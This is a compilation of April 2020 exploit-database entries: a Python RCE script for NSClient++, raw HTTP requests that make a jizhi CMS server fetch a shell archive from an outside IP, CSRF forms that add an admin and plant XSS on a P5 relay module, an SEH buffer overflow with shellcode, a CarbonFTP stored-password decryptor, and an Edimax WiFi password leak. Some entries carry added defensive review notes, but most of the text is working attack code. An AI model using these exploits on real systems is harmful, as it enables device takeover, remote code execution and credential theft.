-
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System by
# default, this leads to privileged code execution.
#
# Review notes (defender's view, limited to what the requests below show):
# - Nothing here bypasses authentication: every step runs with a token obtained from
#   /auth/token using the administrative password. Network exposure of the web interface
#   and the strength of that password are therefore the controls that matter.
# - The password travels as a GET query parameter (see getAuthToken), so any access log or
#   proxy that records query strings will hold it in clear text.
# - Agent-side indicators, in order: GET /registry/control/module/load?name=CheckExternalScripts,
#   POST /settings/query.json writing a new key under "/settings/external scripts/scripts"
#   followed by a SAVE control message, GET /core/reload, then GET /query/<8-13 random letters>.
#   A module load plus a settings write and a reload from a host that is not the monitoring
#   server is a strong signal. The script never removes the key it adds, so the external-script
#   entry persists in the saved settings after the run and can be found on review.
# - Every request passes verify=False, so TLS certificate validation is disabled client-side;
#   the InsecureRequestWarning is silenced explicitly below.

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs  # imported but never referenced below
import urllib3
import json
import sys
import random
import string
import time
import argparse

# Suppress the warning requests emits for verify=False connections.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def generateName() -> str:
    """Return a random ASCII-letter name of 8 to 13 characters.

    Used as the key of the external-script entry so that each run leaves a
    differently named entry in the settings store.
    """
    letters = string.ascii_lowercase + string.ascii_uppercase
    return ''.join(random.choice(letters) for i in range(random.randint(8,13)))


def printStatus(message: str, msg_type: str) -> None:
    """Print *message* with a coloured prefix chosen by *msg_type*.

    "good" -> green [+], "info" -> yellow [!], "bad" -> red [-].
    Any other msg_type leaves the local ``string`` unassigned and the final
    print raises UnboundLocalError; the local also shadows the ``string``
    module inside this function.
    """
    C_YELLOW = '\033[1;33m'
    C_RESET = '\033[0m'
    C_GREEN = '\033[1;32m'
    C_RED = '\033[1;31m'
    if msg_type == "good":
        green_plus = C_GREEN + "[+]" + C_RESET
        string = green_plus + " " + message
    elif msg_type == "info":
        yellow_ex = C_YELLOW + "[!]" + C_RESET
        string = yellow_ex + " " + message
    elif msg_type == "bad":
        red_minus = C_RED + "[-]" + C_RESET
        string = red_minus + " " + message
    print(string)


# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session: requests.Session, cmd: str, key: str) -> None:
    """Write *cmd* as external script *key* via /settings/query.json, then issue SAVE.

    Both requests are SettingsRequestMessage bodies; the first is checked for
    "STATUS_OK" in the response and exits with status 1 otherwise, the second
    (the SAVE control command) is not checked. Reads the module-level base_url.
    Detection note: the update names path "/settings/external scripts/scripts"
    explicitly, which is what a settings-audit or log review should key on.
    """
    printStatus("Configuring Script with Specified Payload . . .", "info")
    endpoint = "/settings/query.json"
    node = { "path" : "/settings/external scripts/scripts", "key" : key }
    value = { "string_data" : cmd }
    update = { "node" : node , "value" : value }
    payload = [ { "plugin_id" : "1234", "update" : update } ]
    json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
    out = session.post(url = base_url + endpoint, json=json_data, verify=False)
    if "STATUS_OK" not in str(out.content):
        printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
        sys.exit(1)
    printStatus("Added External Script (name: " + key + ")", "good")
    time.sleep(3)
    printStatus("Saving Configuration . . .", "info")
    header = { "version" : "1" }
    payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
    json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
    # Persists the change; the result of this request is not inspected.
    session.post(url = base_url + endpoint, json=json_data, verify=False)


# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session: requests.Session) -> None:
    """GET /core/reload, then poll base_url until a non-empty body is returned.

    After a fixed 10 second pause the loop retries on any exception (bare
    except), giving up with exit status 1 after more than 10 failed attempts.
    A successful non-empty response ends the loop; a 2xx/5xx distinction is
    not made.
    """
    printStatus("Reloading Application . . .", "info")
    endpoint = "/core/reload"
    session.get(url = base_url + endpoint, verify=False)
    # Wait until the application successfully reloads by making a request
    # every 10 seconds until it responds.
    printStatus("Waiting for Application to reload . . .", "info")
    time.sleep(10)
    response = False
    count = 0
    while not response:
        try:
            out = session.get(url = base_url, verify=False, timeout=10)
            if len(out.content) > 0:
                response = True
        except:  # bare except: swallows every error type, including KeyboardInterrupt
            count += 1
            if count > 10:
                printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
                sys.exit(1)
            else:
                continue


# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session: requests.Session, key: str) -> None:
    """GET /query/<key>, which runs the configured external script.

    A ReadTimeout is treated as success (the script is assumed to be still
    running) and the process exits with status 0; other exceptions propagate.
    """
    printStatus("Triggering payload, should execute shortly . . .", "info")
    endpoint = "/query/" + key
    try:
        session.get(url = base_url + endpoint, verify=False, timeout=10)
    except requests.exceptions.ReadTimeout:
        printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
        sys.exit(0)


# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session: requests.Session) -> None:
    """Load the CheckExternalScripts module via /registry/control/module/load.

    Exits with status 1 unless the response contains "STATUS_OK".
    Detection note: this module-load request is the first distinctive
    step of the sequence and is issued by an already authenticated session.
    """
    printStatus("Enabling External Scripts Module . . .", "info")
    endpoint = "/registry/control/module/load"
    params = { "name" : "CheckExternalScripts" }
    out = session.get(url = base_url + endpoint, params=params, verify=False)
    if "STATUS_OK" not in str(out.content):
        printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
        sys.exit(1)


# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session: requests.Session) -> str:
    """Exchange the module-level *password* for a token via GET /auth/token.

    The password is sent as the query parameter ``password``, so it appears in
    URL form in server and intermediary logs. Returns the "auth token" value
    from the JSON response; exits with status 1 if that key is absent.
    """
    printStatus("Obtaining Authentication Token . . .", "info")
    endpoint = "/auth/token"
    params = { "password" : password }
    auth = session.get(url = base_url + endpoint, params=params, verify=False)
    if "auth token" in str(auth.content):
        j = json.loads(auth.content)
        authToken = j["auth token"]
        printStatus("Got auth token: " + authToken, "good")
        return authToken
    else:
        printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
        sys.exit(1)


parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()

# Argument-count check rather than per-option validation: a missing -t/-P still
# reaches the string concatenation below and fails with TypeError.
if len(sys.argv) < 4:
    parser.print_help()
    sys.exit(1)

# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c

# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)

# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})

# Execute our code.
triggerPayload(s, randKey)
-
jizhi CMS 1.6.7 - Arbitrary File Download
# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download # Google Dork: jizhicms # Date: 2020-04-18 # Exploit Author: iej1ctk1g # Vendor Homepage: https://www.jizhicms.cn/ # Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip # Version: 1.6.7 # Tested on: Mac OS # CVE : N/A Data 1. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 86 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip Data 2. POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.253:8888 Content-Length: 32 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.253:8888 Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 Connection: close action=file-upzip&filepath=shell
-
P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Google Dork:jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Product web page: https://www.p5.hu
# Affected version: 1.0.20, 1.0.11
# CVE : N/A

<!--
P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting

Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11

Summary: The FNIP-8x16A is an eight channel relay module used for
switching any type of load that doesn't exceed the specifications.
Via its built-in web site and TCP/IP communication, the outputs and
inputs can be controlled and monitored from standard network capable
devices such as computers, smartphones, web-tablets, etc. either locally
or via the network. The module can be used independently or as part of
a complex control system in residential and commercial installations.

Desc: The controller suffers from CSRF and XSS vulnerabilities. The
application allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Input passed to several
GET/POST parameters is not properly sanitised before being returned to
the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: Linux CGI

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php

29.01.2020
-->

<!--
Review note (defensive): each of the three forms below is an ordinary
cross-origin POST carrying only the application's own field names; none of
the fields is a per-session anti-CSRF token, which is why the description
above says the requests are accepted without validity checks. The fix on
the device is a random per-session token embedded in every state-changing
form and verified by user.cgi and config.html, together with a SameSite
attribute on the session cookie and a check of the Origin header. The
third form additionally shows that label values are reflected unencoded;
HTML-encoding labN on output closes the stored XSS independently of the
CSRF fix. Operators can reduce exposure meanwhile by keeping the module on
a management network that browsers used for general web access cannot reach.
-->

<!-- CSRF add admin user -->
<!-- Effect if accepted: creates user slot 1 with role 2, which the field comment below marks as Admin. -->
<html>
  <body>
    <form action="http://192.168.1.17:83/user.cgi" method="POST">
      <input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
      <input type="hidden" name="un" value="testingus" /> <!-- Username -->
      <input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
      <input type="hidden" name="enabled" value="1" />
      <input type="hidden" name="pw" value="123456" />
      <input type="hidden" name="pw2" value="123456" />
      <input type="submit" value="Zubmit" />
    </form>
  </body>
</html>

<!-- CSRF change admin password -->
<!-- Effect if accepted: resets the built-in admin account's password; the default credential noted below should be changed at deployment regardless. -->
<html>
  <body>
    <form action="http://192.168.1.17:83/user.cgi" method="POST">
      <input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
      <input type="hidden" name="pw" value="123456" />
      <input type="hidden" name="pw2" value="123456" />
      <input type="submit" value="Zubmit" />
    </form>
  </body>
</html>

<!-- XSS modify labels -->
<!-- Effect if accepted: stores a script fragment in a channel label (lab4) that is later rendered without encoding. -->
<html>
  <body>
    <form action="http://192.168.1.17:83/config.html" method="POST">
      <input type="hidden" name="lab1" value="Channel1" />
      <input type="hidden" name="lab2" value="Channel2" />
      <input type="hidden" name="lab3" value="Channel3" />
      <input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
      <input type="hidden" name="lab12" value="etc." />
      <input type="submit" value="Zubmit" />
    </form>
  </body>
</html>
-
RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
# Date: 2020-04-20
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
# Version: 3.1.3.2.2010.06.13
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file "poc.txt"
# 2.- Copy the content of the new file 'poc.txt' to clipboard
# 3.- Open 'RmDownloader.exe'
# 4.- Go to 'Load' tab
# 5.- Paste clipboard in 'Load' parameter
# 6.- Click on button 'OK'
# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
#
# Review notes (defender's view):
# - Root cause as the PoC lays it out: the 'Load' field accepts an input long enough
#   (9008 filler bytes before the SEH record) to overwrite the structured exception
#   handler chain. Bounded handling of that field's length is the product-side fix.
# - The handler address is taken from RDfilter03.dll, which the author's annotation records
#   as lacking SafeSEH, ASLR and rebasing. Building that module with /SAFESEH and
#   /DYNAMICBASE, and enforcing DEP for the process, would remove the fixed address this
#   PoC relies on.
# - The payload is the msfvenom windows/exec calc.exe stub noted below: a visible,
#   harmless demonstration rather than an implant.

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf = b""
buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
buf += b"\x50\x65\x67\x70\x41\x41"

# Little-endian 32-bit records for the next-SEH pointer and the handler address.
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)

# NOTE(review): nseh, seh and buf are bytes (struct.pack / b"" literals) while
# "A" * 9008, "\x41\x49" * 10 and "\xff" * 200 are str, so this concatenation
# raises TypeError under Python 3 and the file is opened in text mode ("w").
buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200

# Written to the working directory; not closed via a context manager.
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
-
Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857

import time, string, sys, argparse, os, codecs

#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.

#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947

key="97F"   #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5  #number of bytes we must decrypt the password by.

#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
#
# Review notes (defender's view, grounded in the routine below):
# - The stored value is reversible with a constant key: deob() subtracts int("97F", 16)
#   from each 5-digit decimal chunk and reads the result back as hex-encoded ASCII. There is
#   no per-user or per-file secret, so anyone who can read the .CFTP project file (backup,
#   file share, sync client, malware running as the user) holds the FTP password.
# - Product-side fix: do not store a reversibly "encrypted" password at all; keep it in the
#   OS credential store, or derive the key from a secret the user supplies at runtime.
# - Operators: treat FTP credentials saved in CarbonFTP projects as exposed and rotate them;
#   where possible prefer a protocol that does not depend on a stored reusable password.


def carbonftp_conf(conf_file):
    """Collect the encrypted password values from an open .CFTP file.

    Scans each line for "Password=STRING|" and, when found, takes the text
    after the first "|" (offset +2) up to the last two characters. Each value
    is echoed to stdout and appended to the returned list. Any exception is
    printed and swallowed, so a partial list may be returned.
    """
    p=""
    pipe=-1
    passwd=""
    lst_of_passwds=[]
    try:
        for p in conf_file:
            idx = p.find("Password=STRING|")
            if idx != -1:
                pipe = p.find("|")
                if pipe != -1:
                    passwd = p[pipe + 2: -2]
                    print(" Password found: "+ passwd)
                    lst_of_passwds.append(passwd)
    except Exception as e:
        print(str(e))
    return lst_of_passwds


def reorder(lst):
    """Swap elements in place and return the joined string.

    On iteration n it swaps lst[n+j] and lst[n+k] where j = n+1 and k = n+2
    (both counters start one ahead and increase each pass); positions past
    the end are skipped through the bare pass. Mutates *lst*.
    """
    k=1
    j=0
    for n in range(len(lst)):
        k+=1
        j+=1
        try:
            tmp = lst[n+k]
            a = lst[n+j]
            lst[n+j] = tmp
            lst[n+k] = a
        except Exception as e:
            pass
    return ''.join(lst)


def dec2hex(dec):
    """Return the hex digits of int(dec) without the "0x" prefix."""
    tmp = str(hex(int(dec)))
    return str(tmp[2:])


#Updated for Python version compatibility.
def hex2ascii(h):
    """Decode a hex string to ASCII; exits the process on invalid input."""
    h=h.strip()
    passwd=""
    try:
        passwd = codecs.decode(h, "hex").decode("ascii")
    except Exception as e:
        print("[!] In hex2ascii(), not a valid hex string.")
        exit()
    return passwd


def chunk_passwd(passwd_lst):
    """Split every encrypted value into consecutive chunk_sz-character pieces.

    Returns one flat list for all inputs; the last piece may be shorter.
    """
    lst = []
    for passwd in passwd_lst:
        while passwd:
            lst.append(passwd[:chunk_sz])
            passwd = passwd[chunk_sz:]
    return lst


def strip_non_printable_char(str):
    """Drop characters with ordinal <= 31 except TAB (9).

    The parameter name shadows the builtin ``str`` within this function.
    """
    return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])


# Module-level state shared by deob() across chunks of one password.
cnt = 0
passwd_str=""


def deob(c):
    """Reverse one chunk and append its characters to the global passwd_str.

    Subtracts the fixed key (0x97F) from the decimal chunk, hex-encodes the
    difference, and keeps the first two hex digits for every chunk except the
    second one processed (cnt == 1), for which the first four are kept. The
    decoded, printable text is appended to passwd_str and the whole
    accumulated string is returned as a list of characters. Exits on a
    non-numeric chunk.
    """
    global cnt, passwd_str
    tmp=""
    try:
        tmp = int(c) - int(key, 16)
        tmp = dec2hex(tmp)
    except Exception as e:
        print("[!] Not a valid CarbonFTP encrypted password.")
        exit()
    b=""
    a=""
    #Seems we can delete the second char as its most always junk.
    if cnt!=1:
        a = tmp[:2]
        cnt+=1
    else:
        b = tmp[:4]
    passwd_str += strip_non_printable_char(hex2ascii(a + b))
    hex_passwd_lst = list(passwd_str)
    return hex_passwd_lst


def no_unique_chars(lst):
    """Print a hint and return lst[0] when the first differing pair is absent.

    Walks adjacent pairs; once two neighbours differ the hint is suppressed
    for the rest of the list. Returns False when no hint was printed. The
    counters k and j are incremented but never read.
    """
    c=0
    k=1
    j=0
    for i in range(len(lst)):
        k+=1
        j+=1
        try:
            a = lst[i]
            b = lst[i+1]
            if a != b:
                c+=1
            elif c==0:
                print("[!] Possible one char password?: " +str(lst[0]))
                return lst[0]
        except Exception as e:
            pass
    return False


def decryptor(result_lst):
    """Run deob() over every chunk, reorder the result and return the text.

    Sets the module-level ``sz`` to the reordered length (read later by
    main/display_cracked_passwd). When sz == 9 a " | "-separated list of
    prefix candidates is returned instead of a single value and passwd_str is
    not reset; otherwise passwd_str is cleared before returning.
    """
    global passwd_str, sz
    print(" Decrypting ... \n")
    for i in result_lst:
        print("[-] "+i)
        time.sleep(0.1)
        lst = deob(i)
    #Re-order chars to correct sequence using custom swap function (reorder).
    reordered_pass = reorder(lst)
    sz = len(reordered_pass)
    #Flag possible single char password.
    no_unique_chars(lst)  # return value is not used; the hint is its side effect
    print("[+] PASSWORD LENGTH: " + str(sz))
    if sz == 9:
        return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
    #Shorter passwords less then nine chars will have several candidates
    #as they get padded with repeating chars so we return those.
    passwd_str=""
    return reordered_pass


def display_cracked_passwd(sz, passwd):
    """Print *passwd* as a candidate list when sz == 9, else as the password."""
    if sz==9:
        print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
    else:
        print("[*] DECRYPTED PASSWORD: "+passwd + "\n")


def parse_args():
    """Parse -u/--user and -p/--encrypted_password from the command line."""
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
    parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
    return parser.parse_args()


def main(args):
    """Entry point: process a user's project directory (-u) or one value (-p).

    Rejects both flags together. With -u it changes into the user's
    CarbonFTPProjects directory and processes every entry there as a project
    file; files are opened with open() and closed manually after use.
    """
    global passwd_str, sz
    victim=""
    if args.user and args.encrypted_password:
        print("[!] Supply a victims username -u or single encrypted password -p, not both.")
        exit()
    print("[+] Neowise CarbonFTP v1.4")
    time.sleep(0.1)
    print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
    time.sleep(0.1)
    print("[+] Version 2 Exploit fixed for Python 3 compatibility")
    time.sleep(0.1)
    print("[+] Discovered and cracked by hyp3rlinx")
    time.sleep(0.1)
    print("[+] ApparitionSec\n")
    time.sleep(1)
    #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
    if args.user:
        victim = args.user
        os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
        dir_lst = os.listdir(".")
        for c in dir_lst:
            f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
            #Get encrypted password from conf file
            passwd_enc = carbonftp_conf(f)
            #Break up into 5 byte chunks as processed by the proprietary decryption routine.
            result_lst = chunk_passwd(passwd_enc)
            #Decrypt the 5 byte chunks and reassemble to the cleartext password.
            cracked_passwd = decryptor(result_lst)
            #Print cracked password or candidates.
            display_cracked_passwd(sz, cracked_passwd)
            time.sleep(0.3)
            passwd_str=""
            f.close()
    #Crack a single password -p flag.
    if args.encrypted_password:
        passwd_to_crack_lst = []
        passwd_to_crack_lst.append(args.encrypted_password)
        result = chunk_passwd(passwd_to_crack_lst)
        #Print cracked password or candidates.
        cracked_passwd = decryptor(result)
        display_cracked_passwd(sz, cracked_passwd)


if __name__=="__main__":
    # A throwaway parser is used only to print usage when no arguments are given.
    parser = argparse.ArgumentParser()
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        exit()
    main(parse_args())
-
Edimax EW-7438RPn - Information Disclosure (WiFi Password)
# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password)
# Date: 2020-04-21
# Exploit Author: Besim ALTINOK
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Version:1.13
# Tested on: Edimax EW-7438RPn 1.13 Version

-----------------------------
Here it is, step by step:

1. I completed the setup.
2. After setup, I tried to access the *wlencrypt_wiz.asp* file.
3. After accessing this file, I saw some information disclosure (such as the *WiFi Password*).
4. Here is the full leak:
-------------------------------

<SCRIPT>
var _DATE_="Mon Sep 24 19:38:17 CST 2012";
var _VERSION_="1.13";
var _MODEL_="EW7438RPN";
var _MODE_="Edimax";
var _PLATFORM_="RTL8196CS_1200";
var _HW_LED_WPS_="4";
var _HW_LED_POWER_="6";
var _HW_LED_WIRELESS_="2";
var _HW_BUTTON_RESET_="5";
var _HW_BUTTON_WPS_="1";
var _HW_BUTTON_SWITCH_="3";
var _HW_LED_USB_="17";
var _WIRELESS_IGMPSNOOP_="y";
var _SPECIAL_CHAR_FILTER_IN_SCRIPT_="y";
var _RDISC_="y";
var _WPS_NO_BROADCAST_="y";
var _UPNP_LIB_VERSION2_="y";
var _WDS_UR_INFO_="y";
var _RESERVE_ENCRYPTION_SETTING_="y";
var _IGMP_PROXY_="y";
var _IGMPSNOOP_="y";
var _RFTYPE_="2T2R";
var _MEMBUS_="16";
var _MEMSIZE_="16";
var _MEMTYPE_="SDRAM";
var _FLASHTYPE_="SPI";
var _REMOVE_RADIUS_SERVER_="y";
var _AUTO_CHANNEL_DET_="y";
var _CONTROL_SIDEBAND_="y";
var _WIFI_11N_STANDARD_="y";
var _SETTING_WIZARD_="y";
var _CONFIG_FILE_NAME_="7438RPN";
var _AP_WITH_DNS_="y";
var _USE_DNRD_="y";
var _WPS_MIX_="y";
var _POWER_SAVING_="y";
var _WEB_FILE_NAME_="7438RPN";
var _PINCODE_BY_MAC_="y";
var _UPNP_RESPONDER_="y";
var _MDNS_RESPONDER_="y";
var _NETBIOS_RESPONDER_="y";
var _AP_WITH_DHCP_CLIENT_="y";
var _LLTD_NODENAME_="y";
var _DHCP_SWITCH_="y";
var _CONNECT_TEST_="y";
var _START_BOA_="y";
var _WPS_Daemon_="y";
var security = 1;
apMode = 6;
methodVal = 2;
opMode = 0;
apMachType = 1;
var ssidTbl = new Array("PentesterTraining");
var mirrorTbl = "";
var secModeTbl = new Array("2");
var enable1XTbl = new Array("0");
var _1xMode = "0";
var wepTbl = new Array("0");
var keyTypeTbl = new Array("1");
var wpaCipherTbl = new Array("2");
var pskFormatTbl = new Array("0");
var pskValueTbl = new Array("wifipass123.");
var defaultKeyIdTbl=new Array("0");
var rsIp= "";
var rsPort= "1812";
var rsPassword= "";

--
Besim ALTINOK
